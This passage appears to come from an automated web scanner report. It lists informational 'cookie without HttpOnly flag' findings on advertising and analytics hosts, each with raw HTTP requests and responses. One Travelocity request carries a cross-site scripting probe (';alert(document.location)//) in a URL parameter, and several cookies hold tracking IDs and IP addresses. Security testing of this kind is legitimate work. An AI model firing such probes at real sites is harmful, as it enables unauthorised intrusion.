Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Sat, 21-Oct-2079 03:23:16 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon Oct 03 00:09:09 UTC 2011
Content-Type: image/jpeg
Date: Mon, 03 Oct 2011 00:09:08 GMT
Content-Length: 807

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
14.116. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&c3=345&c4=59764&c5=7061&c15=1931%252C357%252C3196%252C996%252C2712%252C553%252C3115&c16=EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1&ns__t=1317599359145&ns_c=UTF-8&c8=Premier%20League%20football%20news%20from%20the%20Barclays%20Premier%20League%20%7C%20Manchester%20United%202-0%20Norwich%20City&c7=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2469333%2C00.html&c9=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:50:07 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

14.117. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:52:46 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633]]>>; expires=Tue, 01-Oct-2013 23:52:46 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
14.118. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035250&d.c=gif&d.o=guardiangu-network&d.x=43465411&d.t=page&d.u=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:51:22 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:51:22 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
14.119. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p119936314&c3=71054945&c4=43921374&c5=1&c6=1&c7=Sun%20Oct%20%202%2023%3A59%3A13%202011&c8=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome&c9=Official%20Site%20of%20the%20Premier%20League%20-%20Barclays%20Premier%20League%20News%2C%20Fixtures%20and%20Results%20%7C%20Home&c10=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2466648%2C00.html&c15=&1317599979190 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 03 Oct 2011 00:01:13 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Wed, 02-Oct-2013 00:01:13 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

14.120. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=531292&ev=OO-00000000000000000&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DOO-00000000000000000 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr

Response

HTTP/1.1 302 Moved Temporarily
Server: GlassFish v3
CW-Server: cw-app605
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr99f871d6edb7aea19dd0bf8; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:50:17 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|530739.99f871d6ab8391d98e386b3c.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|531292.OO-00000000000000000.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 01-Oct-2012 23:50:17 GMT; Path=/
Location: http://m.xp1.ru4.com/meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 239
Date: Sun, 02 Oct 2011 23:50:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=OO-000000000000
...[SNIP]...
14.121. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://rs.gwallet.com/r1/pixel/x1743
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app607
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:49:59 GMT; Path=/
Set-Cookie: cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; Domain=.contextweb.com; Expires=Mon, 01-Oct-2012 23:49:59 GMT; Path=/
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
14.122. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_27838685759&pid=b5bed322-0d4f-f860-f5e9-119078297d65&s=728x90&f=0.2&url=http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3DINSERT_RANDOM_NUMBER_HERE%26loc%3D&cid=oxpv1%3A34-632-1929-2300-6511&hrid=2b3668b9fdd43266bb92cfe60a9017d3-1317599506 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1317599506; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27838685759({"r":null});
14.123. http://cas.criteo.com/delivery/admeld_map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/admeld_map

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b HTTP/1.1
Host: cas.criteo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; __utma=94712387.960097846.1316386536.1316386536.1316386536.1; __utmz=94712387.1316386536.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/gif
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP='CUR ADM OUR NOR STA NID'
Set-Cookie: extid=4ec87822-8f33-4202-954a-f6f06a37734b; domain=.criteo.com; expires=Mon, 02-Apr-2012 23:49:03 GMT; path=/
Date: Sun, 02 Oct 2011 23:49:02 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
14.124. http://cert.travelocity.com/___waseq.img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cert.travelocity.com
Path:   /___waseq.img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /___waseq.img?Log=1&tntPage=http%3A//www.igougo.com/traveldeals/ratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBostond123a%27%253balert%28document.location%29//08fa278eb24%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10/04/2011%26endDate%3D10/07/2011&tntTitle=Compare%20Hotel%20Rates%20-%20IgoUgo&tntReferrer=http%3A//burp/show/44&tntCampaignID=24175&tntCampaignName=Host%20Group%20Monitoring%20Campaign%20PROD%20%28Copy%29&tntRecipeID=2&tntRecipeName=Prod&tntTrafficType=0&tntOfferID=19910&tntMbox=RateFinderMboxHotels&tntPCID=1317601622475-177474.19&tntSessionID=1317606736569-208906&tntFirstSession=false&tntPageID=1317606736569-208906&tntTime=1317606738116 HTTP/1.1
Host: cert.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 403 Forbidden
Date: Mon, 03 Oct 2011 00:19:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerC202_80_pool=129900204.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /___waseq.img
on this server.</p>
<
...[SNIP]...
14.125. http://clk.atdmt.com/go/352348532/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/352348532/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/352348532/direct;ai.209087168;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.cmegroup.com/advance/
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=eb2a/1c72:ec40/2f33:233cf/1a43a:8bff/7db; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b:c766ac0/7db/15006974/8bff/4e89013e; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close

14.126. http://cms.ad.yieldmanager.net/v1/cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=8772088100672849718&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=274

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 01:53:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=2a9iqdd78i5c1&t=1317606785;path=/; expires=
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 01:53:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
14.127. http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif?&dcsdat=1317600406178&dcssip=www.orbitz.com&dcsuri=/&page=/&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Orbitz%20Travel:%20Airline%20Tickets,%20Cheap%20Hotels,%20Car%20Rentals,%20Vacations%20%26%20Cruises&WT.js=Yes&WT.jv=1.5&WT.bs=1074x850&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.sv=egapp27p&WT.wtsv=1&WT.co_f=50.23.123.106-1472814720.30179680&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=50.23.123.106-1472814720.30179680.1317600406325&hostname=www.orbitz.com&avid=10644782471317600406435&tab=QS&strf=7&b=A&wsid=71A4AF1632EAB3B1F4E0C49149EEC65B&dsrc=7&pos=ORBC&ASimp=1&wtEvtSrc=www.orbitz.com/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAABAAAAPXQAAJn8iE6Z/IhOAQAAABQuAACZ/IhOmfyITgAAAAA-; path=/; expires=Thu, 30-Sep-2021 00:06:49 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
14.128. http://ctix8.cheaptickets.com/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

